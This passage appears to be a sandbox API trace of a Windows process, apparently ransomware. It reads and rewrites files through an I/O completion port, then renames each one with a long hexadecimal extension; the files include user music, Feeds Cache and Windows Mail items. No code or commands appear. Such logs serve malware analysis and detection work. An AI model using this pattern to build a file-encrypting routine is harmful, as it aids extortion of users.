returned 0x270000 [0167.869] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76081a0 | out: hHeap=0x270000) returned 1 [0167.869] RtlInterlockedCompareExchange64 () returned 0x1 [0167.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.870] WriteFile (in: hFile=0x5e4, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0167.871] RtlInterlockedCompareExchange64 () returned 0x0 [0167.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.890] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.892] RtlInterlockedCompareExchange64 () returned 0x0 [0167.892] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.914] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x76900b8, ReturnLength=0x714f8ac) returned 0x0 [0167.915] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a", lpString2=".E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a.E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a.E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416" [0167.915] GetProcessHeap () returned 0x270000 [0167.915] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x4263968 [0167.915] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x714f89c, FileInformation=0x4263968, Length=0x138, FileInformationClass=0xa) returned 0x0 [0167.917] CloseHandle (hObject=0x5e4) returned 1 [0167.917] GetProcessHeap () returned 0x270000 [0167.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.919] RtlInterlockedCompareExchange64 () returned 0x1 [0167.919] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.922] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.923] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.924] RtlInterlockedCompareExchange64 () returned 0x0 [0167.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.949] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.951] RtlInterlockedCompareExchange64 () returned 0x0 [0167.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.969] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.971] RtlInterlockedCompareExchange64 () returned 0x0 [0167.971] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.990] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.992] RtlInterlockedCompareExchange64 () returned 0x0 [0167.992] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.010] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.011] RtlInterlockedCompareExchange64 () returned 0x0 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.029] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.034] RtlInterlockedCompareExchange64 () returned 0x0 [0168.035] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.048] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.050] RtlInterlockedCompareExchange64 () returned 0x0 [0168.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.061] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.062] RtlInterlockedCompareExchange64 () returned 0x0 [0168.062] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.071] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.072] RtlInterlockedCompareExchange64 () returned 0x0 [0168.072] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.082] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.354] RtlInterlockedCompareExchange64 () returned 0x0 [0168.356] RtlInterlockedCompareExchange64 () returned 0x0 [0168.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0169.348] ReadFile (in: hFile=0x5cc, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0169.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.357] ReadFile (in: hFile=0x5cc, lpBuffer=0x7400180, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0170.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.402] WriteFile (in: hFile=0x604, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0170.410] RtlInterlockedCompareExchange64 () returned 0x0 [0170.410] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.658] NtQueryObject (in: Handle=0x604, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x75aa0b8, ReturnLength=0x714f8ac) returned 0x0 [0170.659] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat", lpString2=".143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A" [0170.659] GetProcessHeap () returned 0x270000 [0170.659] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x7418970 [0170.660] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x714f89c, FileInformation=0x7418970, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0170.687] CloseHandle (hObject=0x604) returned 1 [0170.688] GetProcessHeap () returned 0x270000 [0170.689] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.690] RtlInterlockedCompareExchange64 () returned 0x1 [0170.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.699] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0170.699] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.700] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0170.701] RtlInterlockedCompareExchange64 () returned 0x0 [0170.701] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.703] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0170.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log", lpString2=".FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30" [0170.704] GetProcessHeap () returned 0x270000 [0170.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35bb78 [0170.704] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x714f89c, FileInformation=0x35bb78, Length=0x158, FileInformationClass=0xa) returned 0x0 [0170.801] CloseHandle (hObject=0x5a4) returned 1 [0170.803] GetProcessHeap () returned 0x270000 [0170.804] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.804] RtlInterlockedCompareExchange64 () returned 0x1 [0170.804] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.804] ReadFile (in: hFile=0x598, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0170.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.805] ReadFile (in: hFile=0x5d8, lpBuffer=0x757a838, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0170.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.805] ReadFile (in: hFile=0x5b4, lpBuffer=0x7841298, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7821160 | out: lpBuffer=0x7841298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7821160) returned 1 [0170.806] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.806] ReadFile (in: hFile=0x5f4, lpBuffer=0x78693f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x78492b8 | out: lpBuffer=0x78693f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78492b8) returned 1 [0170.806] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.806] ReadFile (in: hFile=0x5f0, lpBuffer=0x7891548, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871410 | out: lpBuffer=0x7891548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871410) returned 1 [0170.807] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.807] WriteFile (in: hFile=0x598, lpBuffer=0x75526e0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8) returned 1 [0170.808] RtlInterlockedCompareExchange64 () returned 0x0 [0170.808] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.808] WriteFile (in: hFile=0x5d8, lpBuffer=0x757a838*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a700) returned 1 [0170.810] RtlInterlockedCompareExchange64 () returned 0x1 [0170.810] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.810] WriteFile (in: hFile=0x5b4, lpBuffer=0x7841298*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7821160 | out: lpBuffer=0x7841298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7821160) returned 1 [0170.811] RtlInterlockedCompareExchange64 () returned 0x2 [0170.811] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.811] WriteFile (in: hFile=0x5f4, lpBuffer=0x78693f0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78492b8 | out: lpBuffer=0x78693f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78492b8) returned 1 [0170.817] RtlInterlockedCompareExchange64 () returned 0x3 [0170.817] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.817] WriteFile (in: hFile=0x5f0, lpBuffer=0x7891548*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871410 | out: lpBuffer=0x7891548*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7871410) returned 1 [0170.819] RtlInterlockedCompareExchange64 () returned 0x4 [0170.819] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.819] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x7532658, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7532658, ReturnLength=0x714f8ac) returned 0x0 [0170.820] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg", lpString2=".FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.FD602CC33AAA29385CF14BF7BB76002FBB77B90E0A3B665AF2F33FCB6A71DE02" [0170.820] GetProcessHeap () returned 0x270000 [0170.820] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x156) returned 0x35bce0 [0170.820] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x714f89c, FileInformation=0x35bce0, Length=0x156, FileInformationClass=0xa) returned 0x0 [0170.822] CloseHandle (hObject=0x598) returned 1 [0170.823] GetProcessHeap () returned 0x270000 [0170.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75325a8 | out: hHeap=0x270000) returned 1 [0170.824] RtlInterlockedCompareExchange64 () returned 0x5 [0170.825] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.825] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x755a7b0, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x755a7b0, ReturnLength=0x714f8ac) returned 0x0 [0170.826] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg", lpString2=".A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.A05043C5AFF17064AE97B0BF57D6B64605EA89CAD55DE4BC98D6ACA0F647666E" [0170.826] GetProcessHeap () returned 0x270000 [0170.826] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35be48 [0170.826] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x714f89c, FileInformation=0x35be48, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.857] CloseHandle (hObject=0x5d8) returned 1 [0170.858] GetProcessHeap () returned 0x270000 [0170.860] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a700 | out: hHeap=0x270000) returned 1 [0170.863] RtlInterlockedCompareExchange64 () returned 0x2 [0170.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.863] WriteFile (in: hFile=0x594, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0170.864] RtlInterlockedCompareExchange64 () returned 0x1 [0170.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.865] WriteFile (in: hFile=0x604, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0170.867] RtlInterlockedCompareExchange64 () returned 0x2 [0170.867] 